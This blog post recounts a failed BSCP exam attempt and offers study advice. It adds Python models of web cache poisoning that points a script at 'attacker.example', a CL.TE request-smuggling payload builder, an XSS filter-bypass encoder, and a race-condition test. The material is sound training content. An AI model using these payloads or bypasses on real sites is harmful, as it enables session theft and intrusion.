What I Learned Failing the BSCP Exam

I failed my first attempt at the Burp Suite Certified Practitioner exam (BSCP). It hurt, and it was a blow to my ego, especially after months of studying.

For those who don’t know, the BSCP is an exam based on PortSwigger’s Web Security Academy training. It’s 100% practical and tests your competency not only in identifying common web vulnerabilities, but in successfully exploiting them.

The exam consists of two web apps. For each one you have to gain initial access as a low-privileged user, escalate your privileges to administrator, and then find a way (typically an RCE or another file-read primitive) to read a flag stored in a file on the server. It sounds easy, but you need at least an intermediate (practitioner) level of understanding across a wide range of web security topics and a strong knowledge of Burp Suite Pro.

This challenge drew me in, as I knew I would learn a ton even just studying for it. And for $99!? I mean come on!

I successfully completed one application but got stuck on the second one. After I got initial access, I just couldn’t figure out how to get to admin. And that’s the thing — one stage can trip you up and cause you to fail.

So, I took my failure hard at first, but I didn’t walk away empty-handed. I gained a ton of knowledge, which I’ll share with you now!

What I learned

Strong Understanding of Web Vulnerabilities

PortSwigger’s Web Security Academy is renowned as one of the best resources for learning web application security. And it’s completely free!

I had experience with the basic OWASP Top 10 vulnerabilities, plus XSS, SSRF, and JWT attacks. But studying for this exam took me far beyond that.

For the vulnerabilities I was already familiar with, I gained a stronger understanding of why they occur in the real world. On top of that, I learned many different, more advanced vulnerabilities, including HTTP request smuggling, insecure deserialization, prototype pollution, and web cache poisoning.

Not only did I understand them in theory, but I learned how to exploit them in impactful ways. For example, I learned how web cache poisoning can be used to inject an attacker-controlled script URL into a popular, cached static page, turning a reflected header into XSS that hits every visitor who is served the poisoned copy.

More Efficient Testing

Before preparing for the exam, my bug hunting methodology mostly consisted of spraying and praying. I’d find interesting endpoints and fuzz them to try to induce errors.

This worked in some cases, but turning these “findings” into exploits was difficult.

Now I have a solid understanding of the contexts in which each vulnerability class is likely to occur. I can look at a piece of functionality and narrow my testing to the vulnerabilities that fit its inputs, tech stack, and functional flow.

The exam prep also taught me how to leverage automation to speed up my manual testing.

In addition to learning how to create custom, targeted scans in Burp, I was exposed to a lot of useful extensions. I learned how to use HTTP Request Smuggler to identify and exploit request smuggling, Param Miner to identify unkeyed inputs vital to exploiting Web Cache Poisoning, and Collaborator Everywhere to identify SSRF in uncommon contexts (to name a few).
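To make the cache poisoning mechanism and the "unkeyed input" idea from the two passages above concrete, here is an added, offline model (not code from the original post or from PortSwigger). The origin, the cache, the host names and the candidate header list are all constructed for the example: the toy origin reflects X-Forwarded-Host into a script URL, and the toy cache keys responses on host and path only, which is exactly the combination that lets one attacker request poison the copy every later visitor receives. The last function is a stripped-down version of the unkeyed-header hunt that Param Miner automates.

```python
"""Offline model of web cache poisoning through an unkeyed header.

Constructed example: toy origin, toy cache, made-up hosts.  Not the code of any
real server or of Burp's Param Miner extension.
"""
from __future__ import annotations

from dataclasses import dataclass, field
from typing import Callable

CANARY = "attacker.example"  # hypothetical attacker-controlled host
CANDIDATE_HEADERS = ["X-Forwarded-Host", "X-Forwarded-Scheme", "X-Original-URL"]


@dataclass
class Request:
    host: str
    path: str
    headers: dict[str, str] = field(default_factory=dict)


def origin_vulnerable(req: Request) -> str:
    """Builds an absolute script URL from X-Forwarded-Host when the header is present."""
    base = req.headers.get("X-Forwarded-Host", req.host)
    return f'<html><script src="//{base}/static/tracking.js"></script></html>'


def origin_fixed(req: Request) -> str:
    """Ignores forwarded-host headers entirely and uses a relative script URL."""
    return '<html><script src="/static/tracking.js"></script></html>'


class Cache:
    """Stores one response per cache key; extra headers can be added to the key."""

    def __init__(self, handler: Callable[[Request], str], keyed_headers: tuple[str, ...] = ()):
        self.handler = handler
        self.keyed_headers = keyed_headers
        self.store: dict[tuple, str] = {}

    def key(self, req: Request) -> tuple:
        return (req.host, req.path) + tuple(req.headers.get(h, "") for h in self.keyed_headers)

    def get(self, req: Request) -> tuple[str, str]:
        k = self.key(req)
        if k in self.store:
            return "HIT", self.store[k]
        body = self.handler(req)
        self.store[k] = body
        return "MISS", body


def poison_then_visit(cache: Cache) -> tuple[bool, str]:
    """Attacker poisons '/', then an innocent visitor requests '/' with no headers.

    Returns (victim received the poisoned copy?, body the victim received).
    """
    cache.get(Request("shop.example", "/", {"X-Forwarded-Host": CANARY}))
    status, body = cache.get(Request("shop.example", "/"))
    return status == "HIT" and CANARY in body, body


def find_unkeyed_reflected_headers(cache: Cache) -> list[str]:
    """Param Miner-style probe: which candidate headers change the response
    without being part of the cache key?  Each probe gets its own cache buster
    so the real page is never poisoned while testing."""
    found = []
    for i, header in enumerate(CANDIDATE_HEADERS):
        buster = f"/?cb={i}"
        cache.get(Request("shop.example", buster, {header: CANARY}))
        _, body = cache.get(Request("shop.example", buster))  # same key, header absent
        if CANARY in body:
            found.append(header)
    return found


if __name__ == "__main__":
    hit, body = poison_then_visit(Cache(origin_vulnerable))
    print("victim poisoned:", hit)
    print(body)
    print("unkeyed reflected headers:", find_unkeyed_reflected_headers(Cache(origin_vulnerable)))
```

Two fixes are shown through the same model: stop reflecting the header (origin_fixed), or add it to the cache key (Cache(..., keyed_headers=("X-Forwarded-Host",))). The second only protects the cache; the reflection itself is still there for a direct, uncached request, so the first is the real fix.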

Burp Knowledge

Solving all of the practitioner labs and completing the exam successfully requires a strong knowledge of Burp Suite Pro (hence the name “Burp Suite Certified Practitioner”).

Before preparing for the exam, the extent of my Burp knowledge was using Repeater, Intruder, and the proxy history at a basic level. Now I can use those features confidently, and I learned other tools as well.

For example, I know how to configure Repeater to manually test for race conditions and HTTP request smuggling, which requires precise control over request ordering and payload byte length (for smuggling that means turning off Repeater’s automatic Content-Length update and making sure every line ending is \r\n, including the trailing \r\n\r\n after the final chunk). I also use Comparer to analyze fuzzing results and Intruder to structure payloads for more advanced attacks, such as fuzzing within JWTs.

Troubleshooting payloads

Because the exam required not only the detection of vulnerabilities but exploitation, I had to efficiently debug payloads when they inevitably went wrong.

One example would be exploiting HTTP request smuggling to capture other users’ requests. Request smuggling payloads are very sensitive: one wrong line ending (requests must use \r\n) or a miscounted Content-Length can throw the entire exploit off. On top of that, timing is essential, because the smuggled prefix has to be sitting on the back-end connection when the victim’s request arrives. It can take a few tries to pull off an exploit even with a technically sound payload.
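The byte-counting point above is easier to see with a model you can run. The following is an added example, not code from the original post: it builds a CL.TE payload with a correctly computed Content-Length, then feeds the same bytes through a model of a Content-Length-only front end and a Transfer-Encoding-only back end, so you can see exactly which bytes get queued as the start of the next request, and what happens when the count is wrong. The host and the smuggled request are made up.

```python
"""CL.TE request-smuggling payload builder plus a model of how a Content-Length
front end and a Transfer-Encoding back end each carve up the same bytes.

Constructed example, not from the original post; host and prefix are made up.
"""
from __future__ import annotations

CRLF = "\r\n"


def build_cl_te(host: str, smuggled_prefix: str, content_length: int | None = None) -> bytes:
    """Return a CL.TE payload.

    Body = zero-length chunk terminator ("0\\r\\n\\r\\n") + the prefix we want the
    back end to prepend to the next request.  Content-Length defaults to the
    real byte count; pass content_length explicitly to see what a miscount does.
    """
    body = f"0{CRLF}{CRLF}".encode() + smuggled_prefix.encode()
    cl = len(body) if content_length is None else content_length
    head = (
        f"POST / HTTP/1.1{CRLF}"
        f"Host: {host}{CRLF}"
        f"Content-Type: application/x-www-form-urlencoded{CRLF}"
        f"Content-Length: {cl}{CRLF}"
        f"Transfer-Encoding: chunked{CRLF}"
        f"{CRLF}"
    )
    return head.encode() + body


def split_headers(raw: bytes) -> tuple[dict[str, str], bytes]:
    """Split one request into a lower-cased header dict and the raw body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers: dict[str, str] = {}
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        name, _, value = line.decode().partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def front_end_cl(raw: bytes) -> tuple[bytes, bytes]:
    """CL-only proxy: forwards the headers plus exactly Content-Length body bytes.

    Returns (bytes forwarded to the back end, bytes left unread on the front end).
    A Content-Length larger than the real body would make a real proxy hang
    waiting for more data; this model simply forwards what it has.
    """
    headers, body = split_headers(raw)
    n = int(headers["content-length"])
    return raw[: len(raw) - len(body)] + body[:n], body[n:]


def back_end_te(raw: bytes) -> tuple[bytes, bytes]:
    """TE-only server: reads chunks until the zero-length terminator.

    Returns (decoded body of this request, leftover bytes that the server will
    treat as the beginning of the *next* request on the connection).
    """
    _, rest = split_headers(raw)
    decoded = b""
    while True:
        size_line, _, rest = rest.partition(b"\r\n")
        size = int(size_line.split(b";")[0], 16)  # ignore chunk extensions
        if size == 0:
            _, _, rest = rest.partition(b"\r\n")  # empty line that ends the trailers
            return decoded, rest
        decoded += rest[:size]
        rest = rest[size + 2:]  # skip chunk data and its trailing CRLF


def smuggle(host: str, prefix: str, content_length: int | None = None) -> dict[str, bytes]:
    """Run one payload through both parsers and report where the bytes ended up."""
    raw = build_cl_te(host, prefix, content_length)
    forwarded, stuck_on_front_end = front_end_cl(raw)
    _, queued_on_back_end = back_end_te(forwarded)
    return {"stuck_on_front_end": stuck_on_front_end, "queued_on_back_end": queued_on_back_end}


if __name__ == "__main__":
    prefix = "GET /admin HTTP/1.1\r\nFoo: x"
    print("correct CL :", smuggle("vulnerable.example", prefix))
    print("CL too small:", smuggle("vulnerable.example", prefix, content_length=29))
```

With the correct Content-Length the whole prefix reaches the back end and waits there for the next request. With a Content-Length three bytes short, the tail of the prefix stays on the front end and the back end only queues a truncated request, which is the silent failure mode that a miscount produces in practice.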

While exploring XSS—especially DOM XSS—I learned how to leverage browser developer tools and DOM Invader to trace sources and sinks, refine payloads, and debug exfiltration techniques.

Obfuscation Techniques

In my opinion, the test was more difficult than any of the labs. I won’t go into my actual exam, but I will use the practice exams as examples (skip this section if you don’t want the practice tests spoiled).

In practice test one, you need to exploit DOM XSS to exfiltrate a user’s session cookie for initial access. However, a simple filter blocks the obvious payloads.

You have to experiment to figure out what is being blocked, then adjust your payload using encodings that the browser will decode in the context where the payload lands. This sounds simple but is stressful to pull off under a time constraint.
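The "encodings that fit the context" idea is worth seeing in code. The following is an added example, not code from the post or from the practice exam, and the denylist it bypasses is constructed for illustration. It shows the two encodings you reach for most often: HTML character references, which the browser decodes inside attribute values before it interprets a URL or event handler, and \uXXXX escapes, which the JavaScript parser decodes inside string literals. In both cases a string-matching filter sees something it does not recognise while the browser ends up with the original payload.

```python
"""Context-aware encodings for slipping a payload past a naive string filter.

Constructed example: the denylist, the contexts and the payloads are made up for
illustration; this is not the practice exam's filter.
"""
import html
import json
import re

BLOCKED = ["<", ">", "alert(", "javascript:"]  # constructed denylist


def naive_filter(payload: str) -> bool:
    """True if the hypothetical filter would reject this payload as-is."""
    low = payload.lower()
    return any(token in low for token in BLOCKED)


def html_entity_encode(s: str) -> str:
    """Decimal character reference for every character (attribute-value context)."""
    return "".join(f"&#{ord(c)};" for c in s)


def minimal_entity_encode(s: str, blocked: list[str] = BLOCKED) -> str:
    """Encode only the first character of each blocked token: enough to break the
    match, short enough to survive length limits on the injection point."""
    for token in blocked:
        s = re.sub(
            re.escape(token),
            lambda m: f"&#{ord(m.group(0)[0])};" + m.group(0)[1:],
            s,
            flags=re.I,
        )
    return s


def js_unicode_escape(s: str) -> str:
    """\\uXXXX escape for every BMP character (JavaScript string-literal context)."""
    return "".join(f"\\u{ord(c):04x}" for c in s)


def encode_for_context(payload: str, context: str) -> str:
    if context == "html_attribute":  # e.g. <a href="HERE"> or onclick="HERE"
        return html_entity_encode(payload)
    if context == "js_string":       # e.g. var name = 'HERE';
        return js_unicode_escape(payload)
    raise ValueError(f"unknown context: {context}")


def browser_decodes(encoded: str, context: str) -> str:
    """Approximation of what the browser sees after decoding in that context."""
    if context == "html_attribute":
        return html.unescape(encoded)
    if context == "js_string":
        return json.loads(f'"{encoded}"')  # JSON and JS share the \\uXXXX rule
    raise ValueError(f"unknown context: {context}")


def try_bypass(payload: str, context: str) -> tuple[str, bool, bool]:
    """Return (encoded payload, does the filter still block it?, does the browser still see the original?)."""
    enc = encode_for_context(payload, context)
    return enc, naive_filter(enc), browser_decodes(enc, context) == payload


if __name__ == "__main__":
    print(try_bypass("javascript:alert(1)", "html_attribute"))
    print(try_bypass("alert(document.cookie)", "js_string"))
    print(minimal_entity_encode("javascript:alert(1)"))
```

The caveat is the word "context": entity encoding only helps when the payload lands inside an attribute value that the browser later interprets (an href, an event handler); in an HTML body context the angle brackets have to be literal, and no amount of entity encoding will turn them into tags. That is why the first step is always to find out where the reflection sits, and only then choose the encoding.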

My advice to you

I not only learned a lot of technical skills preparing for this exam; I also learned how best to prepare for it, which could only have been learned through trial and error.

Hopefully, this will help you in your journey to take the BSCP.

Don’t take shortcuts

The Web Security Academy is extremely dense. PortSwigger has its own list of recommended labs you need to complete to prepare.

But I highly recommend studying every topic and doing every lab to at least the Practitioner level. For one, the biggest takeaway from the process is the learning. A certification is meaningless if you can’t back it up through skills.

I failed the exam, but I believe the learning I went through is much more valuable than the exam result itself. So, be patient and take your time. Truly understand the material you’re learning.

I strongly recommend taking notes as you study and documenting how you solved each lab. I added a “takeaways” section at the end of each lab writeup to capture what I learned beyond the technical skills: for example, any mistakes I made or improvements I could make in future labs.

Learn from the solutions

The solutions should only be viewed as a last resort. Ideally, you should be able to solve the lab by reviewing and understanding the material alone.

However, the solutions can give you insight into the most efficient way to reach the goal, especially the community solutions. You get an idea of how other people approach testing a specific vulnerability class.

I learned how to send a group of requests in parallel from Repeater to test for race conditions, and how to use Turbo Intruder to test for them automatically as well.
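Sending requests "in parallel" matters because the bug only appears when several requests sit in the same window between a check and the action it guards. The following added example (not code from the post; the coupon store is constructed) models that window offline: a threading.Barrier parks every request inside the gap so the race reproduces every time, standing in for the synchronisation that Repeater's parallel send or Turbo Intruder provides against a real target. The same traffic sent one request at a time, which is what a plain Repeater send does, never triggers it.

```python
"""Limit-overrun race condition, modelled offline.

A coupon may be redeemed once.  The vulnerable store checks and then acts with
nothing holding the two steps together; the fixed store does both under one
lock.  Constructed example, not from the original post.
"""
from __future__ import annotations

import threading
from typing import Optional


class CouponStoreVulnerable:
    """Check-then-act with no lock: a classic time-of-check/time-of-use gap."""

    def __init__(self) -> None:
        self.redeemed: set[str] = set()

    def redeem(self, code: str, gate: Optional[threading.Barrier] = None) -> bool:
        if code in self.redeemed:   # check
            return False
        if gate is not None:
            gate.wait()             # every racer is now past the check
        self.redeemed.add(code)     # act: every racer "wins"
        return True


class CouponStoreFixed:
    """Same logic, but check and act happen atomically under one lock."""

    def __init__(self) -> None:
        self.redeemed: set[str] = set()
        self.lock = threading.Lock()

    def redeem(self, code: str, gate: Optional[threading.Barrier] = None) -> bool:
        if gate is not None:
            gate.wait()             # racers arrive together, then queue on the lock
        with self.lock:
            if code in self.redeemed:
                return False
            self.redeemed.add(code)
            return True


def fire_in_parallel(store, code: str, n: int) -> int:
    """Send n redeem requests that reach the race window together; return the
    number that succeeded (a correct server answers 1)."""
    gate = threading.Barrier(n)
    results = [False] * n

    def worker(i: int) -> None:
        results[i] = store.redeem(code, gate)

    threads = [threading.Thread(target=worker, args=(i,)) for i in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results)


def fire_sequentially(store, code: str, n: int) -> int:
    """What one-at-a-time sends see: no overlap, so no race and no finding."""
    return sum(store.redeem(code) for _ in range(n))


if __name__ == "__main__":
    print("vulnerable, sequential:", fire_sequentially(CouponStoreVulnerable(), "SAVE10", 5))
    print("vulnerable, parallel  :", fire_in_parallel(CouponStoreVulnerable(), "SAVE10", 5))
    print("fixed, parallel       :", fire_in_parallel(CouponStoreFixed(), "SAVE10", 5))
```

Against a real application there is no barrier you control, which is why the tooling matters: Repeater's parallel group send and Turbo Intruder's gating both try to land the requests inside the window at once, and several attempts may be needed before the timing lines up.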

Embrace the struggle

Learning all of these vulnerabilities and working through every lab is hard. So, don’t beat yourself up if you’re struggling or taking extra time to understand something.

Struggle is a key sign of growth. If something is difficult, you’re learning.

Without challenging yourself, you’re not doing any learning. So, embrace the struggle as a sign that you’re improving your skills.

Supplement your learning

It can be easy to fall into the trap of perfectionism. I had the mindset for a while that if I didn’t finish all of the labs first, I wouldn’t be ready to apply what I learned.

But, it’s important to apply what you learned no matter what stage you’re in. Bug hunt to experience how real world apps are structured and to strengthen your recon skills. Write blog articles to reinforce what you’ve learned. Build labs of vulnerabilities you learned.

Go beyond the labs. This not only solidifies your learning but will develop your career as well.

Conclusion

The BSCP is the hardest certification I’ve attempted so far, but its challenge and focus on practicality are what make it so great.

I highly recommend at least preparing for the exam, as you will learn most of what you need for a career in web application penetration testing.

You also can’t beat the $99 price tag.

I failed and will definitely be going back for a second attempt. I cannot emphasize enough how much I’ve developed as a tester.

Thanks for reading and I wish you the best in your security journey!